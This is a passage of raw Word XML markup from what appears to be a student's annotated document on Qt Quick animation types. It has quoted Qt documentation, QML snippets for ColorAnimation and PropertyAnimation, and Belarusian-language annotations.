      <w:bookmarkStart w:id="2177" w:name="_Toc483605561"/>
      <w:bookmarkEnd w:id="2173"/>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AnimatedSprite Type</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2174"/>
      <w:bookmarkEnd w:id="2175"/>
      <w:bookmarkEnd w:id="2176"/>
      <w:bookmarkEnd w:id="2177"/>
    </w:p>
    <w:p w:rsidR="00441D0A" w:rsidRPr="00D24254" w:rsidRDefault="00441D0A" w:rsidP="00441D0A">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">For </w:t>
      </w:r>
      <w:r w:rsidRPr="00D24254">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>use-cases which do not need to transition between animations</w:t>
      </w:r>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, consider the</w:t>
      </w:r>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2534" w:anchor="animatedsprite" w:history="1">
        <w:r w:rsidRPr="00441D0A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>AnimatedSprite</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">type. This type displays sprite animations with the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D24254">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">same input format, but </w:t>
      </w:r>
      <w:r w:rsidRPr="00D24254">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>only one at a time</w:t>
      </w:r>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. It also provides </w:t>
      </w:r>
      <w:r w:rsidRPr="00D24254">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>more fine-grained manual control</w:t>
      </w:r>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, as there is no sprite engine managing the timing and transitions behind the scenes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00441D0A" w:rsidRDefault="00441D0A" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F462FB" w:rsidRDefault="00490E7E" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2535" w:history="1">
        <w:r w:rsidR="00601B99" w:rsidRPr="0033006A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://doc.qt.io/qt-5/qtquick-animation-example.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00230BC0" w:rsidRPr="001363F8" w:rsidRDefault="00230BC0" w:rsidP="00D127FB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2178" w:name="_Toc483001001"/>
      <w:bookmarkStart w:id="2179" w:name="_Toc483003992"/>
      <w:bookmarkStart w:id="2180" w:name="_Toc483604342"/>
      <w:bookmarkStart w:id="2181" w:name="_Toc483605562"/>
      <w:r w:rsidRPr="00D127FB">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Qt Quick Examples - Animation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2178"/>
      <w:bookmarkEnd w:id="2179"/>
      <w:bookmarkEnd w:id="2180"/>
      <w:bookmarkEnd w:id="2181"/>
    </w:p>
    <w:p w:rsidR="00230BC0" w:rsidRPr="00230BC0" w:rsidRDefault="00230BC0" w:rsidP="00230BC0">
      <w:pPr>
        <w:pStyle w:val="centeralign"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "http://doc.qt.io/qt-5/images/qml-animations-example.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00123160">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00123160">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-animations-example.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00123160">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0072163C">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="0072163C">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-animations-example.png"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"http://doc.qt.io/qt-5/images/qml-animations-example.png"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"http://doc.qt.io/qt-5/images/qml-animations-example.png"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"http://doc.qt.io/qt-5/images/qml-animations-example.png"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"http://doc.qt.io/qt-5/images/qml-animations-example.png"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"http://doc.qt.io/qt-5/images/qml-animations-example.png"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"http://doc.qt.io/qt-5/images/qml-animations-example.png"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"http://doc.qt.io/qt-5/images/qml-animations-example.png"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"http://doc.qt.io/qt-5/images/qml-animations-example.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002230B8">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_i1075" type="#_x0000_t75" alt="" style="width:237.9pt;height:5in">
            <v:imagedata r:id="rId2536" r:href="rId2537"/>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00123160">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230BC0" w:rsidRP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Animation</w:t>
      </w:r>
      <w:r w:rsidR="006E5677">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00123160">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>collection of small QML examples relating to animation</w:t>
      </w:r>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Each example is a small QML file </w:t>
      </w:r>
      <w:r w:rsidRPr="00123160">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>emphasizing a particular type or feature</w:t>
      </w:r>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230BC0" w:rsidRPr="00230BC0" w:rsidRDefault="00230BC0" w:rsidP="00230BC0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>For more information about animations, visit</w:t>
      </w:r>
      <w:r w:rsidR="00123160">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2538" w:history="1">
        <w:r w:rsidRPr="00230BC0">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Important Concepts in Qt Quick - States, Transitions and Animations</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230BC0" w:rsidRPr="00230BC0" w:rsidRDefault="00230BC0" w:rsidP="00D127FB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2182" w:name="running-the-example"/>
      <w:bookmarkStart w:id="2183" w:name="_Toc483001002"/>
      <w:bookmarkStart w:id="2184" w:name="_Toc483003993"/>
      <w:bookmarkStart w:id="2185" w:name="_Toc483604343"/>
      <w:bookmarkStart w:id="2186" w:name="_Toc483605563"/>
      <w:bookmarkEnd w:id="2182"/>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Running the Example</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2183"/>
      <w:bookmarkEnd w:id="2184"/>
      <w:bookmarkEnd w:id="2185"/>
      <w:bookmarkEnd w:id="2186"/>
    </w:p>
    <w:p w:rsidR="00230BC0" w:rsidRPr="00230BC0" w:rsidRDefault="00230BC0" w:rsidP="00230BC0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>To run the example from</w:t>
      </w:r>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2539" w:history="1">
        <w:r w:rsidRPr="00230BC0">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Creator</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, open the</w:t>
      </w:r>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Welcome</w:t>
      </w:r>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mode and select the example from</w:t>
      </w:r>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Examples</w:t>
      </w:r>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. For more information, visit</w:t>
      </w:r>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2540" w:history="1">
        <w:r w:rsidRPr="00230BC0">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Building and Running an Example</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230BC0" w:rsidRPr="00230BC0" w:rsidRDefault="00230BC0" w:rsidP="00D127FB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2187" w:name="coloranimation"/>
      <w:bookmarkStart w:id="2188" w:name="_Toc483001003"/>
      <w:bookmarkStart w:id="2189" w:name="_Toc483003994"/>
      <w:bookmarkStart w:id="2190" w:name="_Toc483604344"/>
      <w:bookmarkStart w:id="2191" w:name="_Toc483605564"/>
      <w:bookmarkEnd w:id="2187"/>
      <w:r w:rsidRPr="00D127FB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ColorAnimation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2188"/>
      <w:bookmarkEnd w:id="2189"/>
      <w:bookmarkEnd w:id="2190"/>
      <w:bookmarkEnd w:id="2191"/>
    </w:p>
    <w:p w:rsid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ColorAnimation</w:t>
      </w:r>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>uses color animations to fade a sky from day to night.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0089300D" w:rsidRPr="0089300D" w:rsidRDefault="0089300D" w:rsidP="00230BC0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:color w:val="4F9D08"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GradientStop</w:t>
      </w:r>
      <w:r w:rsidRPr="0089300D">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidRPr="0089300D">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>вызначае колер у дадзенай пазіцыі градыента.</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gradient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Gradient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GradientStop</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position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0.0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SequentialAnimation</w:t>
      </w:r>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> on color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loops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Animation</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Infinite</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ColorAnimation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"#14148c"</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"#0E1533"</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ColorAnimation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"#0E1533"</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"#14148c"</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GradientStop</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        position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1.0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SequentialAnimation</w:t>
      </w:r>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> on color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loops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Animation</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Infinite</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ColorAnimation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"#14aaff"</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"#437284"</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ColorAnimation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"#437284"</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"#14aaff"</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Fonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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D127FB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2192" w:name="propertyanimation"/>
      <w:bookmarkStart w:id="2193" w:name="_Toc483001004"/>
      <w:bookmarkStart w:id="2194" w:name="_Toc483003995"/>
      <w:bookmarkStart w:id="2195" w:name="_Toc483604345"/>
      <w:bookmarkStart w:id="2196" w:name="_Toc483605565"/>
      <w:bookmarkEnd w:id="2192"/>
      <w:r w:rsidRPr="00D127FB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PropertyAnimation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2193"/>
      <w:bookmarkEnd w:id="2194"/>
      <w:bookmarkEnd w:id="2195"/>
      <w:bookmarkEnd w:id="2196"/>
    </w:p>
    <w:p w:rsid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PropertyAnimation</w:t>
      </w:r>
      <w:r w:rsidR="0083127B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>uses number animations to bounce a circle up and down.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0083127B" w:rsidRPr="0083127B" w:rsidRDefault="00D127FB" w:rsidP="00230BC0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="0083127B" w:rsidRPr="0083127B">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Тут выкарыстоўваць звязванне для таго, каб выява цені маштабіравалася пры прыжках выявы шарыка, адлюстроўваючы змяншэнне ці павелічэнне ценю.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</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com"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// Animate the y property. Setting loops to Animation.Infinite makes the</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com"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// animation repeat indefinitely, otherwise it would only run once.</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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SequentialAnimation</w:t>
      </w:r>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> on y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loops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Animation</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Infinite</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com"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// Move from minHeight to maxHeight in 300ms, using the OutExpo easing function</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NumberAnimation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smiley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minHeight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smiley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maxHeight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type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Easing</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OutExpo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300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com"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// Then move back to minHeight in 1 second, using the OutBounce easing function</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NumberAnimation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smiley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maxHeight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smiley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minHeight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type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Easing</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OutBounce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1000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com"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// Then pause for 500ms</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PauseAnimation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Fonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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D127FB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
